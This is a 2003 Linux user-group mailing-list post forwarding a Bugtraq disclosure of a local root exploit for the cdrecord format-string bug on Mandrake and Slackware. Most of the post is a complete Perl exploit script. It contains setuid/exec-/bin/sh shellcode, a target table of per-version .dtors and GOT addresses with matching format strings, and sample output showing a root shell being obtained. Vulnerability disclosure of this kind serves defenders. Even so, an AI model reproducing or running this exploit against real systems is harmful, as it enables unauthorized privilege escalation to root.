[vox] [Fwd: Cdrecord local root exploit.]

ME vox@lists.lugod.org
Wed, 14 May 2003 13:18:29 -0700 (PDT)


---------------------------- Original Message ----------------------------
Subject: Cdrecord local root exploit.
From:    yjm01 <yjm01@terra.com.br>
Date:    Tue, May 13, 2003 13:52
To:      bugtraq <bugtraq@securityfocus.com>
--------------------------------------------------------------------------

Priv8security.com

Hi, here it is local root exploit cdrecord format string bug
 Cdrecord come suid root by default on mandrake distro and it can be
executed by anybody.

[wsxz@localhost wsxz]$ ls -l /usr/bin/cdrecord
-rwsr-sr-x    1 root     cdwriter   278156 Jan  6 07:2 /usr/bin/cdrecord*
here goes the code or get it on
http://releases.priv8security.org/priv8cdr.pl

priv8cdr.pl
--------cut here------------------------------------------------------

#!/usr/bin/perl
###########################################################
#Priv8security.com Cdrecord version 2.0 and < local root exploit.
 #
#     Version 1.10 is NOT VULN!!!!
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002
 Jörg Schilling
#   scsidev: '1À1Û°Í1ÛØ°.Íë^1ÀFF
#                               °
#                                óV
#
Í1ÛØ@ÍèÜÿÿÿ/bin/sh%.134802669x%x%x%x%x%x%x%x%x%n:'
#   devname: '1À1Û°Í1ÛØ°.Íë^1ÀFF
#                               °
#                                óV
#
Í1ÛØ@ÍèÜÿÿÿ/bin/sh%.134802669x%x%x%x%x%x%x%x%x%n'
#   scsibus: -1 target: -1 lun: -1
#   Warning: Open by 'devname' is unintentional and not supported.
 #   /usr/bin/cdrecord: No such file or directory. Cannot open '.
Cannot open SCSI driver.
#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'.
 Make sure you are root.
#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord
 dev=help'.
#   sh-2.05b# id
#   uid=0(root) gid=0(root) groups=503(wsxz)
#   sh-2.05b#
#####################################################

                    $shellcode =
                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
                    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
                    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
 "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
 "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
 "\xff\xff/bin/sh";

                    $cdrecordpath = "/usr/bin/cdrecord";
                    $nop = "\x90"; # x86 NOP
                    $offset = 0; # Default offset to try.


     if (@ARGV == 1 || @ARGV == 2) {
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
                    }else{
                    printf(" Priv8security.com Cdrecord local root
exploit!!\n");
                    printf(" usage: $0 target\n");
                    printf(" List of targets:\n");
                    printf("      1 - Linux Mandrake 8.2 Cdrecord
1.11a15\n");
                    printf("      2 - Linux Mandrake 9.0 Cdrecord
1.11a32\n");
                    printf("      3 - Linux Slackware 8.1 Cdrecord
1.11a24 not suid by default!!!\n");
                    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
 exit(1);
                    }

     if ( $target eq "1" ) {
                   $retword = 0x0807af38; #Mr  .dtors ;)
                   $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
                    }
     if ( $target eq "2" ) {
                  # $retword = 0x08084578; #.dtors
                   $retword = 0x08084684; #.GOT exit
                   $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
                    }
      if ( $target eq "3" ) {
                   $retword = 0x0807f658;
                   $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
                    }
       if ( $target eq "4" ) {
                   $retword = 0x0808c82c; #.GOT exit
                   $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
                    }

                    printf("Using target number %d\n", $target);
                    printf("Using Mr .dtors 0x%x\n",$retword);

                    $new_retword = pack('l', ($retword));
                    $new_retshell = pack('l', ($retshell));
                    $buffer2 = $new_retword;
                    $buffer2 .= $nop x 150;
                    $buffer2 .= $shellcode;
                    $buffer2 .= $fmtstring;

                    exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");

--------cut here-----------------------------------------------